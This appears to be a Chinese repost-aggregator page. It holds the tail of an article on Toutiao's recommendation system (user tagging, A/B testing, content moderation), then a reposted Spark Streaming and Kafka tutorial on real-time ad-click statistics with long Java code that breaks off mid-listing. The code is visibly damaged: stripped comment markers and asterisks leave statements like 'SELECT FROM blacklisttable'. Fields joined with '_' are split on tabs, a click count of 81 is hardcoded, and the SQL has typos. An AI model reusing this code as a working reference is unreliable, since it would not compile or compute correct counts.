One的新闻）上的动作做降权处理。理论上，传播范围较大的内容，置信度会下降。三、时间衰减。用户兴趣会发生偏移，因此策略更偏向新的用户行为。因此，随着用户动作的增加，老的特征权重会随时间衰减，新动作贡献的特征权重会更大。四、惩罚展现。如果一篇推荐给用户的文章没有被点击，相关特征（类别，关键词，来源）权重会被惩罚。当然同时，也要考虑全局背景，是不是相关内容推送比较多，以及相关的关闭和dislike信号等。用户标签挖掘总体比较简单，主要还是刚刚提到的工程挑战。头条用户标签第一版是批量计算框架，流程比较简单，每天抽取昨天的日活用户过去两个月的动作数据，在Hadoop集群上批量计算结果。但问题在于，随着用户高速增长，兴趣模型种类和其他批量处理任务都在增加，涉及到的计算量太大。 2014年，批量处理任务几百万用户标签更新的Hadoop任务，当天完成已经开始勉强。集群计算资源紧张很容易影响其它工作，集中写入分布式存储系统的压力也开始增大，并且用户兴趣标签更新延迟越来越高。面对这些挑战。2014年底今日头条上线了用户标签Storm集群流式计算系统。改成流式之后，只要有用户动作更新就更新标签，CPU代价比较小，可以节省80%的CPU时间，大大降低了计算资源开销。同时，只需几十台机器就可以支撑每天数千万用户的兴趣模型更新，并且特征更新速度非常快，基本可以做到准实时。这套系统从上线一直使用至今。当然，我们也发现并非所有用户标签都需要流式系统。像用户的性别、年龄、常驻地点这些信息，不需要实时重复计算，就仍然保留daily更新。四、评估分析上面介绍了推荐系统的整体架构，那么如何评估推荐效果好不好？有一句我认为非常有智慧的话，“一个事情没法评估就没法优化”。对推荐系统也是一样。事实上，很多因素都会影响推荐效果。比如侯选集合变化，召回模块的改进或增加，推荐特征的增加，模型架构的改进在，算法参数的优化等等，不一一举例。评估的意义就在于，很多优化最终可能是负向效果，并不是优化上线后效果就会改进。全面的评估推荐系统，需要完备的评估体系、强大的实验平台以及易用的经验分析工具。所谓完备的体系就是并非单一指标衡量，不能只看点击率或者停留时长等，需要综合评估。很多公司算法做的不好，并非是工程师能力不够，而是需要一个强大的实验平台，还有便捷的实验分析工具，可以智能分析数据指标的置信度。一个良好的评估体系建立需要遵循几个原则，首先是兼顾短期指标与长期指标。我在之前公司负责电商方向的时候观察到，很多策略调整短期内用户觉得新鲜，但是长期看其实没有任何助益。其次，要兼顾用户指标和生态指标。既要为内容创作者提供价值，让他更有尊严的创作，也有义务满足用户，这两者要平衡。还有广告主利益也要考虑，这是多方博弈和平衡的过程。另外，要注意协同效应的影响。实验中严格的流量隔离很难做到，要注意外部效应。强大的实验平台非常直接的优点是，当同时在线的实验比较多时，可以由平台自动分配流量，无需人工沟通，并且实验结束流量立即回收，提高管理效率。这能帮助公司降低分析成本，加快算法迭代效应，使整个系统的算法优化工作能够快速往前推进。这是头条A/B Test实验系统的基本原理。首先我们会做在离线状态下做好用户分桶，然后线上分配实验流量，将桶里用户打上标签，分给实验组。举个例子，开一个10%流量的实验，两个实验组各5%，一个5%是基线，策略和线上大盘一样，另外一个是新的策略。实验过程中用户动作会被搜集，基本上是准实时，每小时都可以看到。但因为小时数据有波动，通常是以天为时间节点来看。动作搜集后会有日志处理、分布式统计、写入数据库，非常便捷。在这个系统下工程师只需要设置流量需求、实验时间、定义特殊过滤条件，自定义实验组ID。系统可以自动生成：实验数据对比、实验数据置信度、实验结论总结以及实验优化建议。当然，只有实验平台是远远不够的。线上实验平台只能通过数据指标变化推测用户体验的变化，但数据指标和用户体验存在差异，很多指标不能完全量化。很多改进仍然要通过人工分析，重大改进需要人工评估二次确认。五、内容安全最后要介绍今日头条在内容安全上的一些举措。头条现在已经是国内最大的内容创作与分发凭条，必须越来越重视社会责任和行业领导者的责任。如果1%的推荐内容出现问题，就会产生较大的影响。现在，今日头条的内容主要来源于两部分，一是具有成熟内容生产能力的PGC平台一是UGC用户内容，如问答、用户评论、微头条。这两部分内容需要通过统一的审核机制。如果是数量相对少的PGC内容，会直接进行风险审核，没有问题会大范围推荐。 UGC内容需要经过一个风险模型的过滤，有问题的会进入二次风险审核。审核通过后，内容会被真正进行推荐。这时如果收到一定量以上的评论或者举报负向反馈，还会再回到复审环节，有问题直接下架。整个机制相对而言比较健全，作为行业领先者，在内容安全上，今日头条一直用最高的标准要求自己。分享内容识别技术主要鉴黄模型，谩骂模型以及低俗模型。今日头条的低俗模型通过深度学习算法训练，样本库非常大，图片、文本同时分析。这部分模型更注重召回率，准确率甚至可以牺牲一些。谩骂模型的样本库同样超过百万，召回率高达95%+，准确率80%+。如果用户经常出言不讳或者不当的评论，我们有一些惩罚机制。泛低质识别涉及的情况非常多，像假新闻、黑稿、题文不符、标题党、内容质量低等等，这部分内容由机器理解是非常难的，需要大量反馈信息，包括其他样本信息比对。目前低质模型的准确率和召回率都不是特别高，还需要结合人工复审，将阈值提高。目前最终的召回已达到95%，这部分其实还有非常多的工作可以做。别平台。如果需要机器学习视频，可以在公众号后台聊天框回复【机器学习】，可以免费获取编程视频。你可能还喜欢数学在机器学习中到底有多重要？ AI 新手学习路线，附上最详细的资源整理！提升机器学习数学基础，推荐7本书酷爆了！围观2020年十大科技趋势机器学习该如何入门，听听过来人的经验！长按加入T圈，接触人工智能觉得内容还不错的话，给我点个“在看”呗本篇文章为转载内容。原文链接：https://blog.csdn.net/itcodexy/article/details/109574173。该文由互联网用户投稿提供，文中观点代表作者本人意见，并不代表本站的立场。作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。

2024-01-13 09:21:23

322

转载

转载文章

[转载]大数据IMF传奇行动绝密课程第104-114课：Spark Streaming电商广告点击综合案例

...表本站的立场。作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。 Spark Streaming电商广告点击综合案例需求分析和技术架构广告点击系统实时分析广告来自于广告或者移动App等，广告需要设定在具体的广告位，当用户点击广告的时候，一般都会通过ajax或Socket往后台发送日志数据，在这里我们是要做基于SparkStreaming做实时在线统计。那么数据就需要放进消息系统（Kafka）中，我们的Spark Streaming应用程序就会去Kafka中Pull数据过来进行计算和消费，并把计算后的数据放入到持久化系统中（MySQL）广告点击系统实时分析的意义：因为可以在线实时的看见广告的投放效果，就为广告的更大规模的投入和调整打下了坚实的基础，从而为公司带来最大化的经济回报。核心需求： 1、实时黑名单动态过滤出有效的用户广告点击行为：因为黑名单用户可能随时出现，所以需要动态更新； 2、在线计算广告点击流量； 3、Top3热门广告； 4、每个广告流量趋势； 5、广告点击用户的区域分布分析 6、最近一分钟的广告点击量； 7、整个广告点击Spark Streaming处理程序724小时运行；数据格式：时间、用户、广告、城市等技术细节：在线计算用户点击的次数分析，屏蔽IP等；使用updateStateByKey或者mapWithState进行不同地区广告点击排名的计算； Spark Streaming+Spark SQL+Spark Core等综合分析数据；使用Window类型的操作；高可用和性能调优等等；流量趋势，一般会结合DB等； Spark Core / /package com.tom.spark.SparkApps.sparkstreaming;import java.util.Date;import java.util.HashMap;import java.util.Map;import java.util.Properties;import java.util.Random;import kafka.javaapi.producer.Producer;import kafka.producer.KeyedMessage;import kafka.producer.ProducerConfig;/ 数据生成代码，Kafka Producer产生数据/public class MockAdClickedStat {/ @param args/public static void main(String[] args) {final Random random = new Random();final String[] provinces = new String[]{"Guangdong", "Zhejiang", "Jiangsu", "Fujian"};final Map<String, String[]> cities = new HashMap<String, String[]>();cities.put("Guangdong", new String[]{"Guangzhou", "Shenzhen", "Dongguan"});cities.put("Zhejiang", new String[]{"Hangzhou", "Wenzhou", "Ningbo"});cities.put("Jiangsu", new String[]{"Nanjing", "Suzhou", "Wuxi"});cities.put("Fujian", new String[]{"Fuzhou", "Xiamen", "Sanming"});final String[] ips = new String[] {"192.168.112.240","192.168.112.239","192.168.112.245","192.168.112.246","192.168.112.247","192.168.112.248","192.168.112.249","192.168.112.250","192.168.112.251","192.168.112.252","192.168.112.253","192.168.112.254",};/ Kafka相关的基本配置信息/Properties kafkaConf = new Properties();kafkaConf.put("serializer.class", "kafka.serializer.StringEncoder");kafkaConf.put("metadeta.broker.list", "Master:9092,Worker1:9092,Worker2:9092");ProducerConfig producerConfig = new ProducerConfig(kafkaConf);final Producer<Integer, String> producer = new Producer<Integer, String>(producerConfig);new Thread(new Runnable() {public void run() {while(true) {//在线处理广告点击流的基本数据格式：timestamp、ip、userID、adID、province、cityLong timestamp = new Date().getTime();String ip = ips[random.nextInt(12)]; //可以采用网络上免费提供的ip库int userID = random.nextInt(10000);int adID = random.nextInt(100);String province = provinces[random.nextInt(4)];String city = cities.get(province)[random.nextInt(3)];String clickedAd = timestamp + "\t" + ip + "\t" + userID + "\t" + adID + "\t" + province + "\t" + city;producer.send(new KeyedMessage<Integer, String>("AdClicked", clickedAd));try {Thread.sleep(50);} catch (InterruptedException e) {// TODO Auto-generated catch blocke.printStackTrace();} }} }).start();} } package com.tom.spark.SparkApps.sparkstreaming;import java.sql.Connection;import java.sql.DriverManager;import java.sql.PreparedStatement;import java.sql.ResultSet;import java.sql.SQLException;import java.util.ArrayList;import java.util.Arrays;import java.util.HashMap;import java.util.HashSet;import java.util.Iterator;import java.util.List;import java.util.Map;import java.util.Set;import java.util.concurrent.LinkedBlockingQueue;import kafka.serializer.StringDecoder;import org.apache.spark.SparkConf;import org.apache.spark.api.java.JavaPairRDD;import org.apache.spark.api.java.JavaRDD;import org.apache.spark.api.java.JavaSparkContext;import org.apache.spark.api.java.function.Function;import org.apache.spark.api.java.function.Function2;import org.apache.spark.api.java.function.PairFunction;import org.apache.spark.api.java.function.VoidFunction;import org.apache.spark.sql.DataFrame;import org.apache.spark.sql.Row;import org.apache.spark.sql.RowFactory;import org.apache.spark.sql.hive.HiveContext;import org.apache.spark.sql.types.DataTypes;import org.apache.spark.sql.types.StructType;import org.apache.spark.streaming.Durations;import org.apache.spark.streaming.api.java.JavaDStream;import org.apache.spark.streaming.api.java.JavaPairDStream;import org.apache.spark.streaming.api.java.JavaPairInputDStream;import org.apache.spark.streaming.api.java.JavaStreamingContext;import org.apache.spark.streaming.api.java.JavaStreamingContextFactory;import org.apache.spark.streaming.kafka.KafkaUtils;import com.google.common.base.Optional;import scala.Tuple2;/ 数据处理，Kafka消费者/public class AdClickedStreamingStats {/ @param args/public static void main(String[] args) {// TODO Auto-generated method stub//好处：1、checkpoint 2、工厂final SparkConf conf = new SparkConf().setAppName("SparkStreamingOnKafkaDirect").setMaster("hdfs://Master:7077/");final String checkpointDirectory = "hdfs://Master:9000/library/SparkStreaming/CheckPoint_Data";JavaStreamingContextFactory factory = new JavaStreamingContextFactory() {public JavaStreamingContext create() {// TODO Auto-generated method stubreturn createContext(checkpointDirectory, conf);} };/ 可以从失败中恢复Driver，不过还需要指定Driver这个进程运行在Cluster，并且在提交应用程序的时候制定--supervise;/JavaStreamingContext javassc = JavaStreamingContext.getOrCreate(checkpointDirectory, factory);/ 第三步：创建Spark Streaming输入数据来源input Stream: 1、数据输入来源可以基于File、HDFS、Flume、Kafka、Socket等 2、在这里我们指定数据来源于网络Socket端口，Spark Streaming连接上该端口并在运行的时候一直监听该端口的数据 (当然该端口服务首先必须存在），并且在后续会根据业务需要不断有数据产生（当然对于Spark Streaming 应用程序的运行而言，有无数据其处理流程都是一样的） 3、如果经常在每间隔5秒钟没有数据的话不断启动空的Job其实会造成调度资源的浪费，因为并没有数据需要发生计算；所以实际的企业级生成环境的代码在具体提交Job前会判断是否有数据，如果没有的话就不再提交Job；///创建Kafka元数据来让Spark Streaming这个Kafka Consumer利用Map<String, String> kafkaParameters = new HashMap<String, String>();kafkaParameters.put("metadata.broker.list", "Master:9092,Worker1:9092,Worker2:9092");Set<String> topics = new HashSet<String>();topics.add("SparkStreamingDirected");JavaPairInputDStream<String, String> adClickedStreaming = KafkaUtils.createDirectStream(javassc, String.class, String.class, StringDecoder.class, StringDecoder.class,kafkaParameters, topics);/因为要对黑名单进行过滤，而数据是在RDD中的，所以必然使用transform这个函数；但是在这里我们必须使用transformToPair，原因是读取进来的Kafka的数据是Pair<String,String>类型, 另一个原因是过滤后的数据要进行进一步处理，所以必须是读进的Kafka数据的原始类型在此再次说明，每个Batch Duration中实际上讲输入的数据就是被一个且仅被一个RDD封装的，你可以有多个 InputDStream，但其实在产生job的时候，这些不同的InputDStream在Batch Duration中就相当于Spark基于HDFS 数据操作的不同文件来源而已罢了。/JavaPairDStream<String, String> filteredadClickedStreaming = adClickedStreaming.transformToPair(new Function<JavaPairRDD<String,String>, JavaPairRDD<String,String>>() {public JavaPairRDD<String, String> call(JavaPairRDD<String, String> rdd) throws Exception {/ 在线黑名单过滤思路步骤： 1、从数据库中获取黑名单转换成RDD，即新的RDD实例封装黑名单数据； 2、然后把代表黑名单的RDD的实例和Batch Duration产生的RDD进行Join操作，准确的说是进行leftOuterJoin操作，也就是说使用Batch Duration产生的RDD和代表黑名单的RDD实例进行 leftOuterJoin操作，如果两者都有内容的话，就会是true，否则的话就是false 我们要留下的是leftOuterJoin结果为false； /final List<String> blackListNames = new ArrayList<String>();JDBCWrapper jdbcWrapper = JDBCWrapper.getJDBCInstance();jdbcWrapper.doQuery("SELECT FROM blacklisttable", null, new ExecuteCallBack() {public void resultCallBack(ResultSet result) throws Exception {while(result.next()){blackListNames.add(result.getString(1));} }});List<Tuple2<String, Boolean>> blackListTuple = new ArrayList<Tuple2<String,Boolean>>();for(String name : blackListNames) {blackListTuple.add(new Tuple2<String, Boolean>(name, true));}List<Tuple2<String, Boolean>> blacklistFromListDB = blackListTuple; //数据来自于查询的黑名单表并且映射成为<String, Boolean>JavaSparkContext jsc = new JavaSparkContext(rdd.context());/ 黑名单的表中只有userID，但是如果要进行join操作的话就必须是Key-Value，所以在这里我们需要基于数据表中的数据产生Key-Value类型的数据集合/JavaPairRDD<String, Boolean> blackListRDD = jsc.parallelizePairs(blacklistFromListDB);/ 进行操作的时候肯定是基于userID进行join，所以必须把传入的rdd进行mapToPair操作转化成为符合格式的RDD/JavaPairRDD<String, Tuple2<String, String>> rdd2Pair = rdd.mapToPair(new PairFunction<Tuple2<String,String>, String, Tuple2<String, String>>() {public Tuple2<String, Tuple2<String, String>> call(Tuple2<String, String> t) throws Exception {// TODO Auto-generated method stubString userID = t._2.split("\t")[2];return new Tuple2<String, Tuple2<String,String>>(userID, t);} });JavaPairRDD<String, Tuple2<Tuple2<String, String>, Optional<Boolean>>> joined = rdd2Pair.leftOuterJoin(blackListRDD);JavaPairRDD<String, String> result = joined.filter(new Function<Tuple2<String,Tuple2<Tuple2<String,String>,Optional<Boolean>>>, Boolean>() {public Boolean call(Tuple2<String, Tuple2<Tuple2<String, String>, Optional<Boolean>>> tuple)throws Exception {// TODO Auto-generated method stubOptional<Boolean> optional = tuple._2._2;if(optional.isPresent() && optional.get()){return false;} else {return true;} }}).mapToPair(new PairFunction<Tuple2<String,Tuple2<Tuple2<String,String>,Optional<Boolean>>>, String, String>() {public Tuple2<String, String> call(Tuple2<String, Tuple2<Tuple2<String, String>, Optional<Boolean>>> t)throws Exception {// TODO Auto-generated method stubreturn t._2._1;} });return result;} });//广告点击的基本数据格式：timestamp、ip、userID、adID、province、cityJavaPairDStream<String, Long> pairs = filteredadClickedStreaming.mapToPair(new PairFunction<Tuple2<String,String>, String, Long>() {public Tuple2<String, Long> call(Tuple2<String, String> t) throws Exception {String[] splited=t._2.split("\t");String timestamp = splited[0]; //YYYY-MM-DDString ip = splited[1];String userID = splited[2];String adID = splited[3];String province = splited[4];String city = splited[5]; String clickedRecord = timestamp + "_" +ip + "_"+userID+"_"+adID+"_"+province +"_"+city;return new Tuple2<String, Long>(clickedRecord, 1L);} });/ 第4.3步：在单词实例计数为1基础上，统计每个单词在文件中出现的总次数/JavaPairDStream<String, Long> adClickedUsers= pairs.reduceByKey(new Function2<Long, Long, Long>() {public Long call(Long i1, Long i2) throws Exception{return i1 + i2;} });/判断有效的点击，复杂化的采用机器学习训练模型进行在线过滤简单的根据ip判断1天不超过100次；也可以通过一个batch duration的点击次数判断是否非法广告点击，通过一个batch来判断是不完整的，还需要一天的数据也可以每一个小时来判断。/JavaPairDStream<String, Long> filterClickedBatch = adClickedUsers.filter(new Function<Tuple2<String,Long>, Boolean>() {public Boolean call(Tuple2<String, Long> v1) throws Exception {if (1 < v1._2){//更新一些黑名单的数据库表return false;} else { return true;} }});//filterClickedBatch.print();//写入数据库filterClickedBatch.foreachRDD(new Function<JavaPairRDD<String,Long>, Void>() {public Void call(JavaPairRDD<String, Long> rdd) throws Exception {rdd.foreachPartition(new VoidFunction<Iterator<Tuple2<String,Long>>>() {public void call(Iterator<Tuple2<String, Long>> partition) throws Exception {//使用数据库连接池的高效读写数据库的方式将数据写入数据库mysql//例如一次插入 1000条 records，使用insertBatch 或 updateBatch//插入的用户数据信息：userID,adID,clickedCount,time//这里面有一个问题，可能出现两条记录的key是一样的，此时需要更新累加操作List<UserAdClicked> userAdClickedList = new ArrayList<UserAdClicked>();while(partition.hasNext()) {Tuple2<String, Long> record = partition.next();String[] splited = record._1.split("\t");UserAdClicked userClicked = new UserAdClicked();userClicked.setTimestamp(splited[0]);userClicked.setIp(splited[1]);userClicked.setUserID(splited[2]);userClicked.setAdID(splited[3]);userClicked.setProvince(splited[4]);userClicked.setCity(splited[5]);userAdClickedList.add(userClicked);}final List<UserAdClicked> inserting = new ArrayList<UserAdClicked>();final List<UserAdClicked> updating = new ArrayList<UserAdClicked>();JDBCWrapper jdbcWrapper = JDBCWrapper.getJDBCInstance();//表的字段timestamp、ip、userID、adID、province、city、clickedCountfor(final UserAdClicked clicked : userAdClickedList) {jdbcWrapper.doQuery("SELECT clickedCount FROM adclicked WHERE"+ " timestamp =? AND userID = ? AND adID = ?",new Object[]{clicked.getTimestamp(), clicked.getUserID(),clicked.getAdID()}, new ExecuteCallBack() {public void resultCallBack(ResultSet result) throws Exception {// TODO Auto-generated method stubif(result.next()) {long count = result.getLong(1);clicked.setClickedCount(count);updating.add(clicked);} else {inserting.add(clicked);clicked.setClickedCount(1L);} }});}//表的字段timestamp、ip、userID、adID、province、city、clickedCountList<Object[]> insertParametersList = new ArrayList<Object[]>();for(UserAdClicked insertRecord : inserting) {insertParametersList.add(new Object[] {insertRecord.getTimestamp(),insertRecord.getIp(),insertRecord.getUserID(),insertRecord.getAdID(),insertRecord.getProvince(),insertRecord.getCity(),insertRecord.getClickedCount()});}jdbcWrapper.doBatch("INSERT INTO adclicked VALUES(?, ?, ?, ?, ?, ?, ?)", insertParametersList);//表的字段timestamp、ip、userID、adID、province、city、clickedCountList<Object[]> updateParametersList = new ArrayList<Object[]>();for(UserAdClicked updateRecord : updating) {updateParametersList.add(new Object[] {updateRecord.getTimestamp(),updateRecord.getIp(),updateRecord.getUserID(),updateRecord.getAdID(),updateRecord.getProvince(),updateRecord.getCity(),updateRecord.getClickedCount() + 1});}jdbcWrapper.doBatch("UPDATE adclicked SET clickedCount = ? WHERE"+ " timestamp =? AND ip = ? AND userID = ? AND adID = ? "+ "AND province = ? AND city = ?", updateParametersList);} });return null;} });//再次过滤，从数据库中读取数据过滤黑名单JavaPairDStream<String, Long> blackListBasedOnHistory = filterClickedBatch.filter(new Function<Tuple2<String,Long>, Boolean>() {public Boolean call(Tuple2<String, Long> v1) throws Exception {//广告点击的基本数据格式：timestamp,ip,userID,adID,province,cityString[] splited = v1._1.split("\t"); //提取key值String date =splited[0];String userID =splited[2];String adID =splited[3];//查询一下数据库同一个用户同一个广告id点击量超过50次列入黑名单//接下来根据date、userID、adID条件去查询用户点击广告的数据表，获得总的点击次数//这个时候基于点击次数判断是否属于黑名单点击int clickedCountTotalToday = 81 ;if (clickedCountTotalToday > 50) {return true;}else {return false ;} }});//map操作，找出用户的idJavaDStream<String> blackListuserIDBasedInBatchOnhistroy =blackListBasedOnHistory.map(new Function<Tuple2<String,Long>, String>() {public String call(Tuple2<String, Long> v1) throws Exception {// TODO Auto-generated method stubreturn v1._1.split("\t")[2];} });//有一个问题，数据可能重复，在一个partition里面重复，这个好办；//但多个partition不能保证一个用户重复，需要对黑名单的整个rdd进行去重操作。//rdd去重了，partition也就去重了，一石二鸟，一箭双雕// 找出了黑名单，下一步就写入黑名单数据库表中JavaDStream<String> blackListUniqueuserBasedInBatchOnhistroy = blackListuserIDBasedInBatchOnhistroy.transform(new Function<JavaRDD<String>, JavaRDD<String>>() {public JavaRDD<String> call(JavaRDD<String> rdd) throws Exception {// TODO Auto-generated method stubreturn rdd.distinct();} });// 下一步写入到数据表中blackListUniqueuserBasedInBatchOnhistroy.foreachRDD(new Function<JavaRDD<String>, Void>() {public Void call(JavaRDD<String> rdd) throws Exception {rdd.foreachPartition(new VoidFunction<Iterator<String>>() {public void call(Iterator<String> t) throws Exception {// TODO Auto-generated method stub//插入的用户信息可以只包含：useID//此时直接插入黑名单数据表即可。//写入数据库List<Object[]> blackList = new ArrayList<Object[]>();while(t.hasNext()) {blackList.add(new Object[]{t.next()});}JDBCWrapper jdbcWrapper = JDBCWrapper.getJDBCInstance();jdbcWrapper.doBatch("INSERT INTO blacklisttable values (?)", blackList);} });return null;} });/广告点击累计动态更新,每个updateStateByKey都会在Batch Duration的时间间隔的基础上进行广告点击次数的更新，更新之后我们一般都会持久化到外部存储设备上，在这里我们存储到MySQL数据库中/JavaPairDStream<String, Long> updateStateByKeyDSteam = filteredadClickedStreaming.mapToPair(new PairFunction<Tuple2<String,String>, String, Long>() {public Tuple2<String, Long> call(Tuple2<String, String> t)throws Exception {String[] splited=t._2.split("\t");String timestamp = splited[0]; //YYYY-MM-DDString ip = splited[1];String userID = splited[2];String adID = splited[3];String province = splited[4];String city = splited[5]; String clickedRecord = timestamp + "_" +ip + "_"+userID+"_"+adID+"_"+province +"_"+city;return new Tuple2<String, Long>(clickedRecord, 1L);} }).updateStateByKey(new Function2<List<Long>, Optional<Long>, Optional<Long>>() {public Optional<Long> call(List<Long> v1, Optional<Long> v2)throws Exception {// v1:当前的Key在当前的Batch Duration中出现的次数的集合，例如{1，1，1，。。。，1}// v2:当前的Key在以前的Batch Duration中积累下来的结果；Long clickedTotalHistory = 0L; if(v2.isPresent()){clickedTotalHistory = v2.get();}for(Long one : v1) {clickedTotalHistory += one;}return Optional.of(clickedTotalHistory);} });updateStateByKeyDSteam.foreachRDD(new Function<JavaPairRDD<String,Long>, Void>() {public Void call(JavaPairRDD<String, Long> rdd) throws Exception {rdd.foreachPartition(new VoidFunction<Iterator<Tuple2<String,Long>>>() {public void call(Iterator<Tuple2<String, Long>> partition) throws Exception {//使用数据库连接池的高效读写数据库的方式将数据写入数据库mysql//例如一次插入 1000条 records，使用insertBatch 或 updateBatch//插入的用户数据信息：timestamp、adID、province、city//这里面有一个问题，可能出现两条记录的key是一样的，此时需要更新累加操作List<AdClicked> AdClickedList = new ArrayList<AdClicked>();while(partition.hasNext()) {Tuple2<String, Long> record = partition.next();String[] splited = record._1.split("\t");AdClicked adClicked = new AdClicked();adClicked.setTimestamp(splited[0]);adClicked.setAdID(splited[1]);adClicked.setProvince(splited[2]);adClicked.setCity(splited[3]);adClicked.setClickedCount(record._2);AdClickedList.add(adClicked);}final List<AdClicked> inserting = new ArrayList<AdClicked>();final List<AdClicked> updating = new ArrayList<AdClicked>();JDBCWrapper jdbcWrapper = JDBCWrapper.getJDBCInstance();//表的字段timestamp、ip、userID、adID、province、city、clickedCountfor(final AdClicked clicked : AdClickedList) {jdbcWrapper.doQuery("SELECT clickedCount FROM adclickedcount WHERE"+ " timestamp = ? AND adID = ? AND province = ? AND city = ?",new Object[]{clicked.getTimestamp(), clicked.getAdID(),clicked.getProvince(), clicked.getCity()}, new ExecuteCallBack() {public void resultCallBack(ResultSet result) throws Exception {// TODO Auto-generated method stubif(result.next()) {long count = result.getLong(1);clicked.setClickedCount(count);updating.add(clicked);} else {inserting.add(clicked);clicked.setClickedCount(1L);} }});}//表的字段timestamp、ip、userID、adID、province、city、clickedCountList<Object[]> insertParametersList = new ArrayList<Object[]>();for(AdClicked insertRecord : inserting) {insertParametersList.add(new Object[] {insertRecord.getTimestamp(),insertRecord.getAdID(),insertRecord.getProvince(),insertRecord.getCity(),insertRecord.getClickedCount()});}jdbcWrapper.doBatch("INSERT INTO adclickedcount VALUES(?, ?, ?, ?, ?)", insertParametersList);//表的字段timestamp、ip、userID、adID、province、city、clickedCountList<Object[]> updateParametersList = new ArrayList<Object[]>();for(AdClicked updateRecord : updating) {updateParametersList.add(new Object[] {updateRecord.getClickedCount(),updateRecord.getTimestamp(),updateRecord.getAdID(),updateRecord.getProvince(),updateRecord.getCity()});}jdbcWrapper.doBatch("UPDATE adclickedcount SET clickedCount = ? WHERE"+ " timestamp =? AND adID = ? AND province = ? AND city = ?", updateParametersList);} });return null;} });/ 对广告点击进行TopN计算，计算出每天每个省份Top5排名的广告因为我们直接对RDD进行操作，所以使用了transfomr算子；/updateStateByKeyDSteam.transform(new Function<JavaPairRDD<String,Long>, JavaRDD<Row>>() {public JavaRDD<Row> call(JavaPairRDD<String, Long> rdd) throws Exception {JavaRDD<Row> rowRDD = rdd.mapToPair(new PairFunction<Tuple2<String,Long>, String, Long>() {public Tuple2<String, Long> call(Tuple2<String, Long> t)throws Exception {// TODO Auto-generated method stubString[] splited=t._1.split("_");String timestamp = splited[0]; //YYYY-MM-DDString adID = splited[3];String province = splited[4];String clickedRecord = timestamp + "_" + adID + "_" + province;return new Tuple2<String, Long>(clickedRecord, t._2);} }).reduceByKey(new Function2<Long, Long, Long>() {public Long call(Long v1, Long v2) throws Exception {// TODO Auto-generated method stubreturn v1 + v2;} }).map(new Function<Tuple2<String,Long>, Row>() {public Row call(Tuple2<String, Long> v1) throws Exception {// TODO Auto-generated method stubString[] splited=v1._1.split("_");String timestamp = splited[0]; //YYYY-MM-DDString adID = splited[3];String province = splited[4];return RowFactory.create(timestamp, adID, province, v1._2);} });StructType structType = DataTypes.createStructType(Arrays.asList(DataTypes.createStructField("timestamp", DataTypes.StringType, true),DataTypes.createStructField("adID", DataTypes.StringType, true),DataTypes.createStructField("province", DataTypes.StringType, true),DataTypes.createStructField("clickedCount", DataTypes.LongType, true)));HiveContext hiveContext = new HiveContext(rdd.context());DataFrame df = hiveContext.createDataFrame(rowRDD, structType);df.registerTempTable("topNTableSource");DataFrame result = hiveContext.sql("SELECT timestamp, adID, province, clickedCount, FROM"+ " (SELECT timestamp, adID, province,clickedCount, "+ "ROW_NUMBER() OVER(PARTITION BY province ORDER BY clickeCount DESC) rank "+ "FROM topNTableSource) subquery "+ "WHERE rank <= 5");return result.toJavaRDD();} }).foreachRDD(new Function<JavaRDD<Row>, Void>() {public Void call(JavaRDD<Row> rdd) throws Exception {// TODO Auto-generated method stubrdd.foreachPartition(new VoidFunction<Iterator<Row>>() {public void call(Iterator<Row> t) throws Exception {// TODO Auto-generated method stubList<AdProvinceTopN> adProvinceTopN = new ArrayList<AdProvinceTopN>();while(t.hasNext()) {Row row = t.next();AdProvinceTopN item = new AdProvinceTopN();item.setTimestamp(row.getString(0));item.setAdID(row.getString(1));item.setProvince(row.getString(2));item.setClickedCount(row.getLong(3));adProvinceTopN.add(item);}// final List<AdProvinceTopN> inserting = new ArrayList<AdProvinceTopN>();// final List<AdProvinceTopN> updating = new ArrayList<AdProvinceTopN>();JDBCWrapper jdbcWrapper = JDBCWrapper.getJDBCInstance();Set<String> set = new HashSet<String>();for(AdProvinceTopN item: adProvinceTopN){set.add(item.getTimestamp() + "_" + item.getProvince());}//表的字段timestamp、adID、province、clickedCountArrayList<Object[]> deleteParametersList = new ArrayList<Object[]>();for(String deleteRecord : set) {String[] splited = deleteRecord.split("_");deleteParametersList.add(new Object[]{splited[0],splited[1]});}jdbcWrapper.doBatch("DELETE FROM adprovincetopn WHERE timestamp = ? AND province = ?", deleteParametersList);//表的字段timestamp、ip、userID、adID、province、city、clickedCountList<Object[]> insertParametersList = new ArrayList<Object[]>();for(AdProvinceTopN insertRecord : adProvinceTopN) {insertParametersList.add(new Object[] {insertRecord.getClickedCount(),insertRecord.getTimestamp(),insertRecord.getAdID(),insertRecord.getProvince()});}jdbcWrapper.doBatch("INSERT INTO adprovincetopn VALUES (?, ?, ?, ?)", insertParametersList);} });return null;} });/ 计算过去半个小时内广告点击的趋势广告点击的基本数据格式：timestamp、ip、userID、adID、province、city/filteredadClickedStreaming.mapToPair(new PairFunction<Tuple2<String,String>, String, Long>() {public Tuple2<String, Long> call(Tuple2<String, String> t)throws Exception {String splited[] = t._2.split("\t");String adID = splited[3];String time = splited[0]; //Todo:后续需要重构代码实现时间戳和分钟的转换提取。此处需要提取出该广告的点击分钟单位return new Tuple2<String, Long>(time + "_" + adID, 1L);} }).reduceByKeyAndWindow(new Function2<Long, Long, Long>() {public Long call(Long v1, Long v2) throws Exception {// TODO Auto-generated method stubreturn v1 + v2;} }, new Function2<Long, Long, Long>() {public Long call(Long v1, Long v2) throws Exception {// TODO Auto-generated method stubreturn v1 - v2;} }, Durations.minutes(30), Durations.milliseconds(5)).foreachRDD(new Function<JavaPairRDD<String,Long>, Void>() {public Void call(JavaPairRDD<String, Long> rdd) throws Exception {// TODO Auto-generated method stubrdd.foreachPartition(new VoidFunction<Iterator<Tuple2<String,Long>>>() {public void call(Iterator<Tuple2<String, Long>> partition)throws Exception {List<AdTrendStat> adTrend = new ArrayList<AdTrendStat>();// TODO Auto-generated method stubwhile(partition.hasNext()) {Tuple2<String, Long> record = partition.next();String[] splited = record._1.split("_");String time = splited[0];String adID = splited[1];Long clickedCount = record._2;/ 在插入数据到数据库的时候具体需要哪些字段？time、adID、clickedCount; 